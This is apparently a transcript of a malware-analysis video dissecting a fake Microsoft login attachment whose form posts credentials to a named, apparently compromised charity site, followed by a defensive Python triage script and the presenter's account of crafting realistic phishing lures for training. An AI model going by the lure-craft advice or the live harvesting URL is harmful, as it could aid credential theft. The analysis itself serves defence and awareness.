FAKE Microsoft Login to Hacked Charity Scam

Captions
I received this email, and I was sent this email from someone who received this email themselves, so their email addresses are redacted, but they saw this email of "Microsoft Cooperation Team, copyright 2023," all in green here: "Microsoft 2023 notice. We, the Microsoft, are updating operation on all email accounts, so please kindly verify updating their email address for proper usage and function as attached file. Still with me, verify their email by following the instruction in the above file. Note: in 24 hours this account will be deactivated if not then verified." Obviously this is a bit of a phishing email. This is a scam, this is a lie, this is deception, but you probably already knew that. Of course they're including this cheesy "hey, Microsoft respects your privacy, here's their address" to try to look legitimate, but it doesn't look all that legitimate anyway.

They have attached a file that I received, and let's go ahead and explore that. Now I am over here in REMnux, the reverse engineering malware Linux distribution. I can go and Control-Alt-T on my keyboard to open up a terminal, F11 to full screen that, and I'll scroll and zoom in with Control and the mouse wheel here. Now I've created a directory for us to go ahead and work with called verify, and in this directory I have this file, verify, the redacted email address, .shtml. Now note the .shtml file extension doesn't really matter; it is still an HTML, or hypertext markup language, document anyway, something that will be opened up in your web browser, as this is the same language that a whole lot of websites use. And this is exactly what the heck this thing looks like if I use Firefox just to open this up in a web browser. This is it: this is the Microsoft login for a lot of their online cloud whatever stuff, whether it's O365 or anything, right, trying to log in to a Microsoft account. Of course they had filled in and autofilled the email address that I've redacted, but I don't know, maybe that just adds to the lure, adds a little bit of a hook, like, oh, you're naturally meant to log in here.

Obviously you could enter your password, but it is a credential harvester. Obviously it's all a lie, it's all a trap, it's all for you to enter your password and your credentials. And maybe there's, I don't know, maybe a thought that, oh, this is super targeted because it has their email address. Well, no, they would have already had the email address, whatever threat actor and hacker adversary, because they emailed this to the person anyway; like, that's part of the campaign. They can build and bundle these and send them out en masse. If we hover over the "can't access your account, click here" button, that is just an anchor tag; it doesn't really go anywhere. That's a lie. The Next button will submit this form, but that doesn't have any specific button and link set to it, so we could go ahead and analyze this. We can take apart what the heck this thing is.

Let's open up our HTML document in our Sublime Text text editor, or whatever text editor we might like, and it is of course HTML, right, regular doctype here. But scrolling down it looks pretty bloody and pretty bad. You can see there are a whole bunch of red or pink or whatever color that might be in Sublime Text for broken lines, lots of newline characters, all seemingly at this, like, I don't know, 80 ruler, for like a terminal printout. That's very weird, but it's breaking a whole lot of stuff, like these links or pages, and I don't know if it was originally like that, it has a newline after every other line, or maybe this is just some byproduct of that person individually sending it to me. But ultimately the page still loads; like, it rendered just fine. I don't know what might be broken here, though, so what I would try to do is replace all these newlines, like a backslash n with regular expressions enabled, and just replace them with nothing, with an empty string, so they're all deleted. All, Control-Alt-Enter on my keyboard, so that way they are all going to be removed. Takes a little bit, Sublime Text is choking through it, but it works and looks good.

Now I can go ahead and save this as, like, no-new-lines.shtml. We could open that thing up, and here it is, basically the exact same page, but I guess it got one of the background images to load just fine. Ultimately this looks super duper gross, though, and it's like raw HTML form because it's all crammed into one line, but we could probably just beautify this with, like, an online beautifier or something easy. I'll grab this thing, we can paste it in, go ahead and beautify that HTML. Let's save this in a new page; we can call it like cleaned.html or so. Right now, thankfully, this cleaned all of the JavaScript, or the client-side code, aside from the HTML present in the document, and naturally I would try to look through this to see, oh, is it doing any AJAX or, like, XHR, whatever, XMLHttpRequest request-response shenanigans here. But noticeably all of these are meant to be designed off of the real, regular Microsoft O365 login, right, so you can see some links, some HTTP references, all referring to maybe like the aacdn, like actual Microsoft images and pictures and all. But take a look at the form here where they actually enter their email address, whatever username, and password to log in. Note that that form is going to end up posting towards this https:// sangabowfoundation.org, images with an extra s, sharepoints.php, uh, presumably SharePoint but with an f, and it's posting to this location, and that's not Microsoft. Now, to drive the point home once more, this is a credential harvester. It's waiting for you to input your username and password, and it'll just get sent right over to that website that will be harvesting, logging them, giving access to whatever threat actor, hacker, or bad person behind it, waiting to collect as much as it can.

Now we can go ahead and take a look at this website. Let's go see, can we go access SharePoint over in our web browser? Let's go ahead and paste that in here. Actually, this might not have even been an issue, like, the user who received this email and sent it to me, maybe they just wouldn't have even gotten it if they had some email filtering set up on their email provider, or like the anti-spam detection and phishing prevention. And actually our sponsor has all that and more, and I'd love to fill you in on Proton.

Email compromise is a constant threat within today's cybersecurity landscape. The best defense is leaning into privacy and security by design, having security baked into software you use. Proton offers encrypted services that help you work towards a better internet. Proton provides easy-to-use encrypted email, calendar, file storage, and VPN access, built on the principle of your data, your rules. Cybersecurity starts with encrypted emails, and with Proton's technologies like PhishGuard, smart spam detection, and anti-spoofing, you remain secure alongside 100 million people trusting Proton to protect their online data. Best of all, you can use Proton for free. Whether or not it's email, calendars, Drive, or VPN, you can use an open source and independently audited software solution that keeps you safe. Personally I use Proton Mail for communication that I want to remain private, and when doing security research Proton VPN is my preferred choice for staying anonymous online. Get privacy by default with Proton and stop other companies from exploiting your data. You can get started with Proton for free at proton.me/john. Huge thanks to Proton for sponsoring this video.

Go ahead and paste that in here, and I'll full screen this, but okay, we got a 404, 404 HTTP response code, of our page not found. However, let me add a specific note here: this could still be a lie, because the back end web server, like the application, the language, the program, the code running in the background for the website, could still say, hey, that page is not found, 404, but it's programmed to just say that, putting that sign up, but it could still be doing whatever it wants, processing that request in the background. Maybe it will just take whatever is passed in as HTTP arguments, the variables that you add in your POST request, just store them in a file or log them or send them someplace else. This 404 might just be lying to us. Now, we don't know that for sure, right; there's no way to know without having that access to the server and the code here, but it still leaves some suspicion.

I'm curious, though. Obviously, like, we're going to sharepoints, with an F, .php. Is that like a fake page? Can I go to sharepoint? Does that exist? No, no, still a 404. What about images, that says extra s? No. I don't know if directory listing will be on, we'll be able to see the files in there. No, it's not, but another 404. How about just regular images? Can we see anything that might be indexed in that? No. Uh, okay, so I guess we'll just go to the home page, see what the heck this thing is. Uh, oh, okay: "Let's Build a Better World Together." This looks pretty wholesome, this looks good, like it, oh, boasts a charity. It's a good thing, but what is this text? Oh, this is a carousel, okay, I'm dragging to get to a new one. "Your small help can make a difference," also nonsense garbage text. Uh, that's lorem ipsum, right? By the way, I'm sorry for folks that don't know, um, lorem ipsum is like those, like, filler text, like, things that just, like, take space to look like there's actual content there, used by like creative people, like designers or website front-end folks, that'll try to fill space and look like there's material there, but there's not. It's all decoy, lie, just to, like, look like something. Like they say, okay, location in Sri Lanka. We got a Gmail address up here and a phone number. I don't know if that's legitimate or not; maybe we could call that number, look it up. I don't know if that area code is right, but the Read More button is another anchor tag; you can see down the bottom left that just takes us right back to this page. So nothing. Um, "Let's make a difference today," lorem ipsum, lorem ipsum, literally copy and pasted. "Join us now" is an anchor tag again, bring the right page. "Become a partner," "Donate now" seems to take us to a donation form page, and the same thing with the Donate Fund link up here. Yeah, yeah, donate now again at the very, very top right, that one is broken though, that's an anchor tag. Wait, where are we going, where are we going? Same page.

What else is here? "Our work: promised to uphold the trust place." That is a JPEG, oh man, give me some more pixels, JPEG, wow. Uh, look at this: 28 years of experience, with "Porter tempura facili" hack, donate to charity all around the world. Wow, okay, we raised 8,500 as of June 2021, but it, it passed. Uh, this is like sad. This is like kind of not okay if it's like a fake, lying-to-you charity foundation. Enter, and maybe get some more email addresses they will just give you. Uh, play a short video, ooh, we got YouTube here. Video's unavailable. Okay, video's no longer available because the YouTube account associated with this video has been terminated. I wonder why. Uh, "questions for us to think on tonight, we funded a whole lot of projects," but look at the footer. The footer is all lorem ipsum, it's all lorem ipsum. Contact info is just flat lorem ipsum: contact us, info@domain.com. Become a volunteer, email, just registered example.com. This is sus. Copyright 2023, powered by Bosa themes. Bosa, I thought Bosa was the name of the website, or like it had that same icon. It's just like a completely ripped theme; it's a WordPress theme, right? So WordPress website, as we could probably assume by like the look of blogs in there, but look, like, okay, this looks identical to the same page we were just on. It's just, it's just whatever. Anyway, is that, that donate form page was seemingly a real thing, though. Can we go to that donate form? I'm assuming it's supposed to be a donate form, right? "Support our cause, help organization by donating today." Okay, this looks kind of real. Donate now, yeah, how much you want to donate? I, oh, I'm so conflicted because I don't know if this is like a real, genuine, actual charity or it's just lies. Are they just grifting money off of this? That's so gross.

What is this phone number, like, can we call that number, or can we, like, go look for that number? Let me Google this. Not a whole lot out there; of course, the exact same page we're on, and then a donation failed page, cached from 2021 still, so this thing's been out for a while. Does it just, like, redirect you to a donation failed after you've actually genuinely donated, or like willingly gave money to something, like asking you to donate again in like a broken, contrived way? Ah, that still feels sus, and it still feels like that, I don't know, if this, it is a WordPress site. Like, if we go to wp-content, can we get some more stuff here? WordPress icon you can see right up at the very top. Okay, wp-content doesn't work, but there are posts: "charity to education for needy people," lorem ipsum, useless. But look, if I go to like, uh, wp-admin, for like the WordPress admin, it is undeniably a WordPress website. Is it like default admin, admin? I don't know. Okay, I probably shouldn't do that. So if you ask me, this is more than likely a compromised WordPress site, as WordPress websites just tend to get hacked and breached in incidents all the time, uh, because of like whatever vulnerable plugins or themes or crap folks add to it. But I'm assuming this is probably, maybe, potentially what would have been a real, or what was a genuine charity or actual wholesome foundation page that was compromised, and now, I don't know, is just lost to the ether of some threat actor, hacker, bad person that has, okay, locked it down, made this garbage page with a theme, uh, asking for donations, trying to retrieve money, and having some credential harvester set up through these emails that it might send out with fake Microsoft logins.

The thing is, though, this, this is a dumb phishing email. Like, this is bad. This is literally everything that they tell you in, like, computer security phishing awareness training 101, right? Like, look for weird, uh, I don't know, green text, like a big banner that is not Microsoft colors, that's not part of their brand or color palette, broken English, uh, typos here and there, obviously an email address that doesn't make sense. You should not fall for this. No one should fall for this, right? Maybe, I don't know, some folks might happen to if they're moving quick or if they just aren't educated, in the mix on all this stuff. But look, I feel like in today's world, right, cyber criminals or threat actors or hacker folks can really up the ante on the lure and the bait and the hook here. Like, if I may, I, I, I send phishing emails, like, as part of my job. We do education and training and user awareness, and I craft and create phishing emails to try and fool someone so that they can simulate a phishing exercise and we can get better and improve and bolster security for the right reasons. So when I craft a phishing email, I want to make something that more people will click on because it seems more likely, more realistic, and more probable, and I'm not, I don't want to have any of those typos or broken English or weird stuff, and I want to properly impersonate maybe the vendor or the provider that I am masquerading as.

So this is one that I built out, and I try to make it as realistic as possible, so to speak. Hey, obviously this looks like the Southwest Airlines provider, and I say, hey John, look, I've got your name, I got randomly generated rewards number, ticket number, and a confirmation from one airport to the next, and so look, I say, hey, your flight has been canceled. Now this might be weird to someone. They might be like, wait a second, I don't even have a flight, what the heck's going on, let me go make sure with my account that this is all good. Or they say, oh shoot, I'm actually traveling, what the heck's going on. I don't know, they might see this reservation and say that's not right at all; they'll want to go update the reservation, click on the big link, and that is the compromise. So let me ask you, I don't know, are you more than likely to click on this, that looks real, as something like the "Microsoft 2023 notice" all in green text? I know there's meant to be the sense of urgency, but if something affects their lives, like, oh, your hotel room has been canceled, or whoops, we're changing our work from home policy and you must be in the office every day, apologies to those who do, people are going to click on that. They're going to open the PDF that you send when they say, hey, here's my resume for my job interview, HR. I'm sorry, I'm rambling, I know I'm getting a little bit heated, but hey, I hope this was fun. I hope it was kind of cool. I hope it was a good little exploration of a credential harvester faking, spoofing, and impersonating a real Microsoft login, and then some weird, wacky, compromised potential WordPress site just asking for money. Thanks so much for watching, everyone. Hope you enjoyed it. If you did, please do like, comment, subscribe, do all those YouTube algorithm things, and maybe, look, you wouldn't get that phishing email in the first place. Maybe you've got that email filtering, maybe you're hooked up with our sponsor here. Hope you go take a look at Proton. Thanks, everyone, I'll see you in the next one.
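The manual triage in the video (strip the line breaks that wrapped the .shtml at about 80 columns, then find the login form and see where it posts) can be scripted so the same check runs over every attachment an analyst receives. The Python below is an added example written for this page; it is not code from the video or from John Hammond. The sample page, the `compromised-site.example` domain, the `/uploads/poster.php` path and the victim address are all constructed placeholders, and `TRUSTED_HOSTS` is an assumption about where a genuine Microsoft sign-in form submits.

```python
"""Triage a suspected credential-harvesting HTML page (added example).

Mirrors the two steps from the walkthrough: strip the stray line breaks that
wrapped the document at roughly 80 columns, then find every <form> and check
where it submits. The sample page and every domain name in it are constructed
for this example; they are not indicators from the real email.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: where a genuine Microsoft sign-in form would submit. Extend for
# whichever brand the page impersonates.
TRUSTED_HOSTS = {"login.microsoftonline.com", "login.live.com"}


class FormCollector(HTMLParser):
    """Record each <form>'s action/method and the <input> elements inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": a.get("method", "get").lower() or "get",
                             "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({"name": a.get("name", ""),
                                            "type": a.get("type", "text").lower() or "text",
                                            "value": a.get("value", "")})

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def strip_wrapping(html):
    """Step 1 from the video: delete every line break so split tags rejoin."""
    return re.sub(r"\r?\n", "", html)


def triage(html, trusted_hosts=TRUSTED_HOSTS):
    """Step 2: list each form, its submit target, and whether it is off-brand."""
    parser = FormCollector()
    parser.feed(strip_wrapping(html))
    findings = []
    for form in parser.forms:
        host = urlparse(form["action"]).hostname or ""
        has_password = any(i["type"] == "password" for i in form["inputs"])
        prefilled = [i["value"] for i in form["inputs"]
                     if i["type"] in ("text", "email") and "@" in i["value"]]
        findings.append({
            "action_host": host,
            "method": form["method"],
            "harvests_password": has_password,
            "prefilled_emails": prefilled,
            # A password form that posts anywhere but the brand's own login
            # host is the tell the video points at.
            "off_brand_target": has_password and host not in trusted_hosts,
        })
    return findings


# Constructed sample: a look-alike login page with the 80-column wrapping
# problem (note the line break inside the action URL) and a pre-filled victim
# address, posting to a placeholder third-party domain.
SAMPLE_PAGE = (
    '<!DOCTYPE html><html><body>\n'
    '<form id="login" method="post" action="https://compromised-site.example/uplo\n'
    'ads/poster.php">\n'
    '<input type="email" name="loginfmt" value="victim@example.com">\n'
    '<input type="password" name="passwd">\n'
    '<input type="submit" value="Next">\n'
    '</form>\n'
    '<a href="#">Can\'t access your account?</a>\n'
    '</body></html>\n'
)

if __name__ == "__main__":
    for f in triage(SAMPLE_PAGE):
        verdict = "OFF-BRAND TARGET" if f["off_brand_target"] else "expected host"
        print(f'{f["method"].upper()} -> {f["action_host"] or "(relative)"}: {verdict}; '
              f'password field: {f["harvests_password"]}; prefilled: {f["prefilled_emails"]}')
```

Run it on the saved attachment by reading the file into `triage()`; the `off_brand_target` flag reproduces the judgement made in the video (a password field posting to a host that is not the impersonated brand's login). As the video notes, a 404 from that host proves nothing about whether the submission is logged, so the form target itself, not the server's reply, is the indicator worth recording.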
Info
Channel: John Hammond
Views: 24,435
Keywords: cybersecurity, learn, programming, coding, capture the flag, ctf, malware, analysis, dark web, how to learn cybersecurity, beginners
Id: 3Vy2l1kv7Cc
Length: 15min 56sec (956 seconds)
Published: Thu Jun 08 2023